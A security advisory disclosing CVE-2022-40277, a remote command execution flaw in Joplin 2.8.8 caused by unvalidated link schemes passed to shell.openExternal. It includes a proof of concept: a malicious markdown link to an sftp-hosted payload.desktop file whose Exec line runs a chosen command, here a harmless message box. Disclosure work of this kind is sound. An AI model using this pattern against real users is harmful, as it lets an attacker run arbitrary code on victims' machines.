Joplin 2.8.8 - Remote Command Execution

Summary

NameJoplin 2.8.8 - Remote Command Execution
Code nameSkrillex
ProductJoplin
Affected versionsVersion 2.8.8
StatePublic
Release date2022-09-26

Vulnerability

KindRemote command execution
Rule004. Remote command execution
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
CVSSv3 Base Score7.7
Exploit availableYes
CVE ID(s)CVE-2022-40277

Description

Joplin version 2.8.8 allows an external attacker to execute arbitrary commands remotely on any client that opens a link in a malicious markdown file, via Joplin. This is possible because the application does not properly validate the schema/protocol of existing links in the markdown file before passing them to the shell.openExternal function.

Vulnerability

This vulnerability occurs due to improper scheme/protocol validation of external URLs. Here is a small example to give you a better understanding of vulnerability.

image

image

Basically what the application is doing is sending to shell.openExternal(url), any url present in the markdown file.

Exploitation requirements

To achieve the RCE, the attacker will abuse certain schemes/protocols. Some of these only work on windows, others on MACos, others only work correctly under certain specific Linux distributions. In my case, I used Xubuntu 20.04 (Xfce) to simulate a victim. I chose this distribution because in its default configuration it executes the payload.desktop file after mounting the remote location where the payload file is located. In other Linux distributions by default these files are not executed once the remote location is mounted.

In the resources section I will provide you with support material so that you can understand in greater depth what I have just explained.

Exploitation

To exploit this vulnerability, you must send the following file to a user to open with Joplin:

exploit.md

[exploit](sftp://[email protected]/uploads/payload.desktop)

payload.desktop

In the Exec parameter you put the command you want the victim to execute.

[Desktop Entry]
Exec=xmessage "RCE by cbelloatfluid"
Type=Application

Evidence of exploitation

RCE-Joplin

Our security police

We have reserved the CVE-2022-40277 to refer to this issue from now on.

System Information

  • Version: Joplin 2.8.8

  • Operating System: GNU/Linux - Xubuntu 20.04 (Xfce)

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

References

Vendor page https://github.com/laurent22/joplin

Timeline

Time-lapse-logo

2022-09-07

Vulnerability discovered.

Time-lapse-logo

2022-09-08

Vendor contacted.

Time-lapse-logo

2022-09-26

Public Disclosure.